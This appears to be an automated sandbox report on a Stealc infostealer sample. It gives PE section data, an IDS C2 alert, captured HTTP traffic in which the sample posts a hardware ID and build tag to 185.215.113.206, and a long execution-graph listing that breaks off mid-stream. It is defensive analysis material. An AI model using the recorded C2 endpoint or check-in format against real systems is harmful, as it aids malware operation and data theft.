IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(unprintable name) | 0x1000 | 0x25b000 | 0x22800 | bfeb4566c6d87ebd710a7a5049f11e6d | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x25c000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x25d000 | 0x1000 | 0x200 | c60c4959cc8d384ac402730cc6842bb0 | False | 0.1328125 | data | 0.9064079259880791 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(unprintable name) | 0x25e000 | 0x2aa000 | 0x200 | 9ba1eef0f2aff503869767d78979a731 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
seldsqgz | 0x508000 | 0x1a3000 | 0x1a2e00 | ab950336ba1c3dbe68372038087b3990 | False | 0.9948511172038198 | data | 7.953063323630895 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
ogrbyegi | 0x6ab000 | 0x1000 | 0x600 | 905ffb54bfb86591753c1937b881ad38 | False | 0.5423177083333334 | data | 4.817418758238148 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x6ac000 | 0x3000 | 0x2200 | 9d56e6285b980e7bfb5bf1d165d0154b | False | 0.06410845588235294 | DOS executable (COM) | 0.6561681218445133 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
DLL | Import
kernel32.dll | lstrcpy
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-26T08:52:26.981236+0200 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.8 | 49705 | 185.215.113.206 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 26, 2024 08:52:25.769180059 CEST | 49705 | 80 | 192.168.2.8 | 185.215.113.206
Oct 26, 2024 08:52:25.779836893 CEST | 80 | 49705 | 185.215.113.206 | 192.168.2.8
Oct 26, 2024 08:52:25.780020952 CEST | 49705 | 80 | 192.168.2.8 | 185.215.113.206
Oct 26, 2024 08:52:25.780199051 CEST | 49705 | 80 | 192.168.2.8 | 185.215.113.206
Oct 26, 2024 08:52:25.790601015 CEST | 80 | 49705 | 185.215.113.206 | 192.168.2.8
Oct 26, 2024 08:52:26.686675072 CEST | 80 | 49705 | 185.215.113.206 | 192.168.2.8
Oct 26, 2024 08:52:26.686775923 CEST | 49705 | 80 | 192.168.2.8 | 185.215.113.206
Oct 26, 2024 08:52:26.689475060 CEST | 49705 | 80 | 192.168.2.8 | 185.215.113.206
Oct 26, 2024 08:52:26.701966047 CEST | 80 | 49705 | 185.215.113.206 | 192.168.2.8
Oct 26, 2024 08:52:26.981126070 CEST | 80 | 49705 | 185.215.113.206 | 192.168.2.8
Oct 26, 2024 08:52:26.981235981 CEST | 49705 | 80 | 192.168.2.8 | 185.215.113.206
Oct 26, 2024 08:52:30.099559069 CEST | 49705 | 80 | 192.168.2.8 | 185.215.113.206
                                • 185.215.113.206
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49705 | 185.215.113.206 | 80 | 7460 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
Oct 26, 2024 08:52:25.780199051 CEST | 90 | OUT | GET / HTTP/1.1
Host: 185.215.113.206
Connection: Keep-Alive
Cache-Control: no-cache
Oct 26, 2024 08:52:26.686675072 CEST | 203 | IN | HTTP/1.1 200 OK
Date: Sat, 26 Oct 2024 06:52:26 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Oct 26, 2024 08:52:26.689475060 CEST | 413 | OUT | POST /e2b1563c6670f193.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----IEBAAFCAFCBKFHJJJKKF
Host: 185.215.113.206
Content-Length: 211
Connection: Keep-Alive
Cache-Control: no-cache
Data Raw: 2d 2d 2d 2d 2d 2d 49 45 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 45 33 44 42 36 33 36 43 31 30 31 32 32 36 33 31 38 30 30 32 35 0d 0a 2d 2d 2d 2d 2d 2d 49 45 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 70 75 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 49 45 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 2d 2d 0d 0a
Data Ascii: ------IEBAAFCAFCBKFHJJJKKFContent-Disposition: form-data; name="hwid"BE3DB636C1012263180025------IEBAAFCAFCBKFHJJJKKFContent-Disposition: form-data; name="build"puma------IEBAAFCAFCBKFHJJJKKF--
Oct 26, 2024 08:52:26.981126070 CEST | 210 | IN | HTTP/1.1 200 OK
Date: Sat, 26 Oct 2024 06:52:26 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 8
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 59 6d 78 76 59 32 73 3d
Data Ascii: YmxvY2s=



                                Target ID:0
                                Start time:02:52:21
                                Start date:26/10/2024
                                Path:C:\Users\user\Desktop\file.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\file.exe"
                                Imagebase:0xf60000
                                File size:1'872'384 bytes
                                MD5 hash:79AD5F851A1231DB208F005432D0CF1C
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1466069910.00000000016DE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1424901603.0000000005380000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:low
                                Has exited:true


                                  Execution Graph

                                  Execution Coverage:9.1%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:10.1%
                                  Total number of Nodes:2000
                                  Total number of Limit Nodes:24
execution_graph (rendered call graph; the node/edge listing is reduced here to the call sequence it records, by function address):
  f769f0 -> f62260 -> repeated calls of f645c0 (RtlAllocateHeap, VirtualProtect) -> f79860 (GetPEB, five LoadLibraryA calls, a chain of GetProcAddress calls) -> f76a00 -> f7a740 (lstrcpy) -> f611d0
  f611d0 -> f61160 (GetSystemInfo) -> f61110 (GetCurrentProcess, VirtualAllocExNuma) -> f610a0 (VirtualAlloc, VirtualFree) -> f61220 -> f789b0 (GlobalMemoryStatusEx) -> f76770 (GetUserDefaultLangID); each of these stages has a branch to ExitProcess, and f76792 after GetUserDefaultLangID has five separate ExitProcess branches
  f767d3 -> f61190 -> f778e0 / f77850 (GetProcessHeap, RtlAllocateHeap, GetUserNameA, GetComputerNameA; ExitProcess branch at f611c4) -> f76a30 -> f7a9b0 (lstrlen, lstrcpy, lstrcat) -> f76a64 -> f7a8a0 (lstrcpy) -> f76ac2 (OpenEventA; one branch to CreateEventA, the other to CloseHandle and Sleep, looping back) -> f76920 (GetSystemTime) -> f76820 (lstrcpy string assembly) -> sscanf -> SystemTimeToFileTime, SystemTimeToFileTime (ExitProcess branch at f769d8) -> f75b10
  f75b10 -> f7a820 (lstrlen, lstrcpy) -> f76430 -> f626a0 (second long chain of f645c0 calls) -> f75cc3 -> lstrcpy helpers -> f77500 (GetWindowsDirectoryA) -> f64880 -> f717a0 -> f61590 -> f65960 (34 API calls) -> f71050 -> f70d90 -> f70f40 -> f71a10 -> f64fb0 (GetProcessHeap, RtlAllocateHeap, InternetOpenA) -> f70740 -> f75f60 -> f65960 -> f75fa0 (listing continues)
14170->14171 14172 f645c0 2 API calls 14171->14172 14173 f64513 14172->14173 14174 f645c0 2 API calls 14173->14174 14175 f6452c 14174->14175 14176 f645c0 2 API calls 14175->14176 14177 f64545 14176->14177 14178 f645c0 2 API calls 14177->14178 14179 f6455e 14178->14179 14180 f645c0 2 API calls 14179->14180 14181 f64577 14180->14181 14182 f645c0 2 API calls 14181->14182 14183 f64590 14182->14183 14184 f645c0 2 API calls 14183->14184 14185 f645a9 14184->14185 14186 f79c10 14185->14186 14187 f7a036 8 API calls 14186->14187 14188 f79c20 43 API calls 14186->14188 14189 f7a146 14187->14189 14190 f7a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14187->14190 14188->14187 14191 f7a216 14189->14191 14192 f7a153 8 API calls 14189->14192 14190->14189 14193 f7a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14191->14193 14194 f7a298 14191->14194 14192->14191 14193->14194 14195 f7a337 14194->14195 14196 f7a2a5 6 API calls 14194->14196 14197 f7a344 9 API calls 14195->14197 14198 f7a41f 14195->14198 14196->14195 14197->14198 14199 f7a4a2 14198->14199 14200 f7a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14198->14200 14201 f7a4dc 14199->14201 14202 f7a4ab GetProcAddress GetProcAddress 14199->14202 14200->14199 14203 f7a515 14201->14203 14204 f7a4e5 GetProcAddress GetProcAddress 14201->14204 14202->14201 14205 f7a612 14203->14205 14206 f7a522 10 API calls 14203->14206 14204->14203 14207 f7a67d 14205->14207 14208 f7a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14205->14208 14206->14205 14209 f7a686 GetProcAddress 14207->14209 14210 f7a69e 14207->14210 14208->14207 14209->14210 14211 f7a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14210->14211 14212 f75ca3 14210->14212 14211->14212 14213 f61590 14212->14213 15334 f61670 14213->15334 14216 f7a7a0 lstrcpy 14217 f615b5 14216->14217 14218 f7a7a0 lstrcpy 14217->14218 14219 f615c7 14218->14219 14220 f7a7a0 
lstrcpy 14219->14220 14221 f615d9 14220->14221 14222 f7a7a0 lstrcpy 14221->14222 14223 f61663 14222->14223 14224 f75510 14223->14224 14225 f75521 14224->14225 14226 f7a820 2 API calls 14225->14226 14227 f7552e 14226->14227 14228 f7a820 2 API calls 14227->14228 14229 f7553b 14228->14229 14230 f7a820 2 API calls 14229->14230 14231 f75548 14230->14231 14232 f7a740 lstrcpy 14231->14232 14233 f75555 14232->14233 14234 f7a740 lstrcpy 14233->14234 14235 f75562 14234->14235 14236 f7a740 lstrcpy 14235->14236 14237 f7556f 14236->14237 14238 f7a740 lstrcpy 14237->14238 14269 f7557c 14238->14269 14239 f7a820 lstrlen lstrcpy 14239->14269 14240 f7a8a0 lstrcpy 14240->14269 14241 f75643 StrCmpCA 14241->14269 14242 f756a0 StrCmpCA 14244 f757dc 14242->14244 14242->14269 14243 f7a7a0 lstrcpy 14243->14269 14245 f7a8a0 lstrcpy 14244->14245 14246 f757e8 14245->14246 14247 f7a820 2 API calls 14246->14247 14250 f757f6 14247->14250 14248 f7a740 lstrcpy 14248->14269 14249 f751f0 20 API calls 14249->14269 14252 f7a820 2 API calls 14250->14252 14251 f75856 StrCmpCA 14253 f75991 14251->14253 14251->14269 14255 f75805 14252->14255 14254 f7a8a0 lstrcpy 14253->14254 14256 f7599d 14254->14256 14257 f61670 lstrcpy 14255->14257 14258 f7a820 2 API calls 14256->14258 14259 f75811 14257->14259 14261 f759ab 14258->14261 14259->13331 14260 f752c0 25 API calls 14260->14269 14263 f7a820 2 API calls 14261->14263 14262 f75a0b StrCmpCA 14264 f75a16 Sleep 14262->14264 14265 f75a28 14262->14265 14267 f759ba 14263->14267 14264->14269 14266 f7a8a0 lstrcpy 14265->14266 14268 f75a34 14266->14268 14270 f61670 lstrcpy 14267->14270 14271 f7a820 2 API calls 14268->14271 14269->14239 14269->14240 14269->14241 14269->14242 14269->14243 14269->14248 14269->14249 14269->14251 14269->14260 14269->14262 14275 f7578a StrCmpCA 14269->14275 14277 f61590 lstrcpy 14269->14277 14278 f7593f StrCmpCA 14269->14278 14270->14259 14272 f75a43 14271->14272 14273 f7a820 2 API calls 14272->14273 14274 f75a52 14273->14274 14276 f61670 
lstrcpy 14274->14276 14275->14269 14276->14259 14277->14269 14278->14269 14280 f77553 GetVolumeInformationA 14279->14280 14281 f7754c 14279->14281 14282 f77591 14280->14282 14281->14280 14283 f775fc GetProcessHeap RtlAllocateHeap 14282->14283 14284 f77619 14283->14284 14285 f77628 wsprintfA 14283->14285 14287 f7a740 lstrcpy 14284->14287 14286 f7a740 lstrcpy 14285->14286 14288 f75da7 14286->14288 14287->14288 14288->13352 14290 f7a7a0 lstrcpy 14289->14290 14291 f64899 14290->14291 15343 f647b0 14291->15343 14293 f648a5 14294 f7a740 lstrcpy 14293->14294 14295 f648d7 14294->14295 14296 f7a740 lstrcpy 14295->14296 14297 f648e4 14296->14297 14298 f7a740 lstrcpy 14297->14298 14299 f648f1 14298->14299 14300 f7a740 lstrcpy 14299->14300 14301 f648fe 14300->14301 14302 f7a740 lstrcpy 14301->14302 14303 f6490b InternetOpenA StrCmpCA 14302->14303 14304 f64944 14303->14304 14305 f64ecb InternetCloseHandle 14304->14305 15349 f78b60 14304->15349 14307 f64ee8 14305->14307 15364 f69ac0 CryptStringToBinaryA 14307->15364 14308 f64963 15357 f7a920 14308->15357 14311 f64976 14313 f7a8a0 lstrcpy 14311->14313 14319 f6497f 14313->14319 14314 f7a820 2 API calls 14315 f64f05 14314->14315 14316 f7a9b0 4 API calls 14315->14316 14318 f64f1b 14316->14318 14317 f64f27 ctype 14321 f7a7a0 lstrcpy 14317->14321 14320 f7a8a0 lstrcpy 14318->14320 14322 f7a9b0 4 API calls 14319->14322 14320->14317 14334 f64f57 14321->14334 14323 f649a9 14322->14323 14324 f7a8a0 lstrcpy 14323->14324 14325 f649b2 14324->14325 14326 f7a9b0 4 API calls 14325->14326 14327 f649d1 14326->14327 14328 f7a8a0 lstrcpy 14327->14328 14329 f649da 14328->14329 14330 f7a920 3 API calls 14329->14330 14331 f649f8 14330->14331 14332 f7a8a0 lstrcpy 14331->14332 14333 f64a01 14332->14333 14335 f7a9b0 4 API calls 14333->14335 14334->13355 14336 f64a20 14335->14336 14337 f7a8a0 lstrcpy 14336->14337 14338 f64a29 14337->14338 14339 f7a9b0 4 API calls 14338->14339 14340 f64a48 14339->14340 14341 f7a8a0 lstrcpy 14340->14341 14342 f64a51 
14341->14342 14343 f7a9b0 4 API calls 14342->14343 14344 f64a7d 14343->14344 14345 f7a920 3 API calls 14344->14345 14346 f64a84 14345->14346 14347 f7a8a0 lstrcpy 14346->14347 14348 f64a8d 14347->14348 14349 f64aa3 InternetConnectA 14348->14349 14349->14305 14350 f64ad3 HttpOpenRequestA 14349->14350 14352 f64ebe InternetCloseHandle 14350->14352 14353 f64b28 14350->14353 14352->14305 14354 f7a9b0 4 API calls 14353->14354 14355 f64b3c 14354->14355 14356 f7a8a0 lstrcpy 14355->14356 14357 f64b45 14356->14357 14358 f7a920 3 API calls 14357->14358 14359 f64b63 14358->14359 14360 f7a8a0 lstrcpy 14359->14360 14361 f64b6c 14360->14361 14362 f7a9b0 4 API calls 14361->14362 14363 f64b8b 14362->14363 14364 f7a8a0 lstrcpy 14363->14364 14365 f64b94 14364->14365 14366 f7a9b0 4 API calls 14365->14366 14367 f64bb5 14366->14367 14368 f7a8a0 lstrcpy 14367->14368 14369 f64bbe 14368->14369 14370 f7a9b0 4 API calls 14369->14370 14371 f64bde 14370->14371 14372 f7a8a0 lstrcpy 14371->14372 14373 f64be7 14372->14373 14374 f7a9b0 4 API calls 14373->14374 14375 f64c06 14374->14375 14376 f7a8a0 lstrcpy 14375->14376 14377 f64c0f 14376->14377 14378 f7a920 3 API calls 14377->14378 14379 f64c2d 14378->14379 14380 f7a8a0 lstrcpy 14379->14380 14381 f64c36 14380->14381 14382 f7a9b0 4 API calls 14381->14382 14383 f64c55 14382->14383 14384 f7a8a0 lstrcpy 14383->14384 14385 f64c5e 14384->14385 14386 f7a9b0 4 API calls 14385->14386 14387 f64c7d 14386->14387 14388 f7a8a0 lstrcpy 14387->14388 14389 f64c86 14388->14389 14390 f7a920 3 API calls 14389->14390 14391 f64ca4 14390->14391 14392 f7a8a0 lstrcpy 14391->14392 14393 f64cad 14392->14393 14394 f7a9b0 4 API calls 14393->14394 14395 f64ccc 14394->14395 14396 f7a8a0 lstrcpy 14395->14396 14397 f64cd5 14396->14397 14398 f7a9b0 4 API calls 14397->14398 14399 f64cf6 14398->14399 14400 f7a8a0 lstrcpy 14399->14400 14401 f64cff 14400->14401 14402 f7a9b0 4 API calls 14401->14402 14403 f64d1f 14402->14403 14404 f7a8a0 lstrcpy 14403->14404 14405 f64d28 14404->14405 
14406 f7a9b0 4 API calls 14405->14406 14407 f64d47 14406->14407 14408 f7a8a0 lstrcpy 14407->14408 14409 f64d50 14408->14409 14410 f7a920 3 API calls 14409->14410 14411 f64d6e 14410->14411 14412 f7a8a0 lstrcpy 14411->14412 14413 f64d77 14412->14413 14414 f7a740 lstrcpy 14413->14414 14415 f64d92 14414->14415 14416 f7a920 3 API calls 14415->14416 14417 f64db3 14416->14417 14418 f7a920 3 API calls 14417->14418 14419 f64dba 14418->14419 14420 f7a8a0 lstrcpy 14419->14420 14421 f64dc6 14420->14421 14422 f64de7 lstrlen 14421->14422 14423 f64dfa 14422->14423 14424 f64e03 lstrlen 14423->14424 15363 f7aad0 14424->15363 14426 f64e13 HttpSendRequestA 14427 f64e32 InternetReadFile 14426->14427 14428 f64e67 InternetCloseHandle 14427->14428 14433 f64e5e 14427->14433 14431 f7a800 14428->14431 14430 f7a9b0 4 API calls 14430->14433 14431->14352 14432 f7a8a0 lstrcpy 14432->14433 14433->14427 14433->14428 14433->14430 14433->14432 15370 f7aad0 14434->15370 14436 f717c4 StrCmpCA 14437 f717d7 14436->14437 14438 f717cf ExitProcess 14436->14438 14439 f719c2 14437->14439 14440 f71913 StrCmpCA 14437->14440 14441 f71932 StrCmpCA 14437->14441 14442 f718f1 StrCmpCA 14437->14442 14443 f71951 StrCmpCA 14437->14443 14444 f71970 StrCmpCA 14437->14444 14445 f7187f StrCmpCA 14437->14445 14446 f7185d StrCmpCA 14437->14446 14447 f718cf StrCmpCA 14437->14447 14448 f718ad StrCmpCA 14437->14448 14449 f7a820 lstrlen lstrcpy 14437->14449 14439->13357 14440->14437 14441->14437 14442->14437 14443->14437 14444->14437 14445->14437 14446->14437 14447->14437 14448->14437 14449->14437 14451 f7a7a0 lstrcpy 14450->14451 14452 f65979 14451->14452 14453 f647b0 2 API calls 14452->14453 14454 f65985 14453->14454 14455 f7a740 lstrcpy 14454->14455 14456 f659ba 14455->14456 14457 f7a740 lstrcpy 14456->14457 14458 f659c7 14457->14458 14459 f7a740 lstrcpy 14458->14459 14460 f659d4 14459->14460 14461 f7a740 lstrcpy 14460->14461 14462 f659e1 14461->14462 14463 f7a740 lstrcpy 14462->14463 14464 f659ee InternetOpenA StrCmpCA 
14463->14464 14465 f65a1d 14464->14465 14466 f65fc3 InternetCloseHandle 14465->14466 14467 f78b60 3 API calls 14465->14467 14468 f65fe0 14466->14468 14469 f65a3c 14467->14469 14471 f69ac0 4 API calls 14468->14471 14470 f7a920 3 API calls 14469->14470 14472 f65a4f 14470->14472 14473 f65fe6 14471->14473 14474 f7a8a0 lstrcpy 14472->14474 14475 f7a820 2 API calls 14473->14475 14478 f6601f ctype 14473->14478 14479 f65a58 14474->14479 14476 f65ffd 14475->14476 14477 f7a9b0 4 API calls 14476->14477 14480 f66013 14477->14480 14482 f7a7a0 lstrcpy 14478->14482 14483 f7a9b0 4 API calls 14479->14483 14481 f7a8a0 lstrcpy 14480->14481 14481->14478 14491 f6604f 14482->14491 14484 f65a82 14483->14484 14485 f7a8a0 lstrcpy 14484->14485 14486 f65a8b 14485->14486 14487 f7a9b0 4 API calls 14486->14487 14488 f65aaa 14487->14488 14489 f7a8a0 lstrcpy 14488->14489 14490 f65ab3 14489->14490 14492 f7a920 3 API calls 14490->14492 14491->13363 14493 f65ad1 14492->14493 14494 f7a8a0 lstrcpy 14493->14494 14495 f65ada 14494->14495 14496 f7a9b0 4 API calls 14495->14496 14497 f65af9 14496->14497 14498 f7a8a0 lstrcpy 14497->14498 14499 f65b02 14498->14499 14500 f7a9b0 4 API calls 14499->14500 14501 f65b21 14500->14501 14502 f7a8a0 lstrcpy 14501->14502 14503 f65b2a 14502->14503 14504 f7a9b0 4 API calls 14503->14504 14505 f65b56 14504->14505 14506 f7a920 3 API calls 14505->14506 14507 f65b5d 14506->14507 14508 f7a8a0 lstrcpy 14507->14508 14509 f65b66 14508->14509 14510 f65b7c InternetConnectA 14509->14510 14510->14466 14511 f65bac HttpOpenRequestA 14510->14511 14513 f65fb6 InternetCloseHandle 14511->14513 14514 f65c0b 14511->14514 14513->14466 14515 f7a9b0 4 API calls 14514->14515 14516 f65c1f 14515->14516 14517 f7a8a0 lstrcpy 14516->14517 14518 f65c28 14517->14518 14519 f7a920 3 API calls 14518->14519 14520 f65c46 14519->14520 14521 f7a8a0 lstrcpy 14520->14521 14522 f65c4f 14521->14522 14523 f7a9b0 4 API calls 14522->14523 14524 f65c6e 14523->14524 14525 f7a8a0 lstrcpy 14524->14525 14526 f65c77 
14525->14526 14527 f7a9b0 4 API calls 14526->14527 14528 f65c98 14527->14528 14529 f7a8a0 lstrcpy 14528->14529 14530 f65ca1 14529->14530 14531 f7a9b0 4 API calls 14530->14531 14532 f65cc1 14531->14532 14533 f7a8a0 lstrcpy 14532->14533 14534 f65cca 14533->14534 14535 f7a9b0 4 API calls 14534->14535 14536 f65ce9 14535->14536 14537 f7a8a0 lstrcpy 14536->14537 14538 f65cf2 14537->14538 14539 f7a920 3 API calls 14538->14539 14540 f65d10 14539->14540 14541 f7a8a0 lstrcpy 14540->14541 14542 f65d19 14541->14542 14543 f7a9b0 4 API calls 14542->14543 14544 f65d38 14543->14544 14545 f7a8a0 lstrcpy 14544->14545 14546 f65d41 14545->14546 14547 f7a9b0 4 API calls 14546->14547 14548 f65d60 14547->14548 14549 f7a8a0 lstrcpy 14548->14549 14550 f65d69 14549->14550 14551 f7a920 3 API calls 14550->14551 14552 f65d87 14551->14552 14553 f7a8a0 lstrcpy 14552->14553 14554 f65d90 14553->14554 14555 f7a9b0 4 API calls 14554->14555 14556 f65daf 14555->14556 14557 f7a8a0 lstrcpy 14556->14557 14558 f65db8 14557->14558 14559 f7a9b0 4 API calls 14558->14559 14560 f65dd9 14559->14560 14561 f7a8a0 lstrcpy 14560->14561 14562 f65de2 14561->14562 14563 f7a9b0 4 API calls 14562->14563 14564 f65e02 14563->14564 14565 f7a8a0 lstrcpy 14564->14565 14566 f65e0b 14565->14566 14567 f7a9b0 4 API calls 14566->14567 14568 f65e2a 14567->14568 14569 f7a8a0 lstrcpy 14568->14569 14570 f65e33 14569->14570 14571 f7a920 3 API calls 14570->14571 14572 f65e54 14571->14572 14573 f7a8a0 lstrcpy 14572->14573 14574 f65e5d 14573->14574 14575 f65e70 lstrlen 14574->14575 15371 f7aad0 14575->15371 14577 f65e81 lstrlen GetProcessHeap RtlAllocateHeap 15372 f7aad0 14577->15372 14579 f65eae lstrlen 14580 f65ebe 14579->14580 14581 f65ed7 lstrlen 14580->14581 14582 f65ee7 14581->14582 14583 f65ef0 lstrlen 14582->14583 14584 f65f04 14583->14584 14585 f65f1a lstrlen 14584->14585 15373 f7aad0 14585->15373 14587 f65f2a HttpSendRequestA 14588 f65f35 InternetReadFile 14587->14588 14589 f65f6a InternetCloseHandle 14588->14589 14593 f65f61 
14588->14593 14589->14513 14591 f7a9b0 4 API calls 14591->14593 14592 f7a8a0 lstrcpy 14592->14593 14593->14588 14593->14589 14593->14591 14593->14592 14596 f71077 14594->14596 14595 f71151 14595->13365 14596->14595 14597 f7a820 lstrlen lstrcpy 14596->14597 14597->14596 14603 f70db7 14598->14603 14599 f70f17 14599->13373 14600 f70e27 StrCmpCA 14600->14603 14601 f70e67 StrCmpCA 14601->14603 14602 f70ea4 StrCmpCA 14602->14603 14603->14599 14603->14600 14603->14601 14603->14602 14604 f7a820 lstrlen lstrcpy 14603->14604 14604->14603 14606 f70f67 14605->14606 14607 f71044 14606->14607 14608 f70fb2 StrCmpCA 14606->14608 14609 f7a820 lstrlen lstrcpy 14606->14609 14607->13381 14608->14606 14609->14606 14611 f7a740 lstrcpy 14610->14611 14612 f71a26 14611->14612 14613 f7a9b0 4 API calls 14612->14613 14614 f71a37 14613->14614 14615 f7a8a0 lstrcpy 14614->14615 14616 f71a40 14615->14616 14617 f7a9b0 4 API calls 14616->14617 14618 f71a5b 14617->14618 14619 f7a8a0 lstrcpy 14618->14619 14620 f71a64 14619->14620 14621 f7a9b0 4 API calls 14620->14621 14622 f71a7d 14621->14622 14623 f7a8a0 lstrcpy 14622->14623 14624 f71a86 14623->14624 14625 f7a9b0 4 API calls 14624->14625 14626 f71aa1 14625->14626 14627 f7a8a0 lstrcpy 14626->14627 14628 f71aaa 14627->14628 14629 f7a9b0 4 API calls 14628->14629 14630 f71ac3 14629->14630 14631 f7a8a0 lstrcpy 14630->14631 14632 f71acc 14631->14632 14633 f7a9b0 4 API calls 14632->14633 14634 f71ae7 14633->14634 14635 f7a8a0 lstrcpy 14634->14635 14636 f71af0 14635->14636 14637 f7a9b0 4 API calls 14636->14637 14638 f71b09 14637->14638 14639 f7a8a0 lstrcpy 14638->14639 14640 f71b12 14639->14640 14641 f7a9b0 4 API calls 14640->14641 14642 f71b2d 14641->14642 14643 f7a8a0 lstrcpy 14642->14643 14644 f71b36 14643->14644 14645 f7a9b0 4 API calls 14644->14645 14646 f71b4f 14645->14646 14647 f7a8a0 lstrcpy 14646->14647 14648 f71b58 14647->14648 14649 f7a9b0 4 API calls 14648->14649 14650 f71b76 14649->14650 14651 f7a8a0 lstrcpy 14650->14651 14652 f71b7f 
14651->14652 14653 f77500 6 API calls 14652->14653 14654 f71b96 14653->14654 14655 f7a920 3 API calls 14654->14655 14656 f71ba9 14655->14656 14657 f7a8a0 lstrcpy 14656->14657 14658 f71bb2 14657->14658 14659 f7a9b0 4 API calls 14658->14659 14660 f71bdc 14659->14660 14661 f7a8a0 lstrcpy 14660->14661 14662 f71be5 14661->14662 14663 f7a9b0 4 API calls 14662->14663 14664 f71c05 14663->14664 14665 f7a8a0 lstrcpy 14664->14665 14666 f71c0e 14665->14666 15374 f77690 GetProcessHeap RtlAllocateHeap 14666->15374 14669 f7a9b0 4 API calls 14670 f71c2e 14669->14670 14671 f7a8a0 lstrcpy 14670->14671 14672 f71c37 14671->14672 14673 f7a9b0 4 API calls 14672->14673 14674 f71c56 14673->14674 14675 f7a8a0 lstrcpy 14674->14675 14676 f71c5f 14675->14676 14677 f7a9b0 4 API calls 14676->14677 14678 f71c80 14677->14678 14679 f7a8a0 lstrcpy 14678->14679 14680 f71c89 14679->14680 15381 f777c0 GetCurrentProcess IsWow64Process 14680->15381 14683 f7a9b0 4 API calls 14684 f71ca9 14683->14684 14685 f7a8a0 lstrcpy 14684->14685 14686 f71cb2 14685->14686 14687 f7a9b0 4 API calls 14686->14687 14688 f71cd1 14687->14688 14689 f7a8a0 lstrcpy 14688->14689 14690 f71cda 14689->14690 14691 f7a9b0 4 API calls 14690->14691 14692 f71cfb 14691->14692 14693 f7a8a0 lstrcpy 14692->14693 14694 f71d04 14693->14694 14695 f77850 3 API calls 14694->14695 14696 f71d14 14695->14696 14697 f7a9b0 4 API calls 14696->14697 14698 f71d24 14697->14698 14699 f7a8a0 lstrcpy 14698->14699 14700 f71d2d 14699->14700 14701 f7a9b0 4 API calls 14700->14701 14702 f71d4c 14701->14702 14703 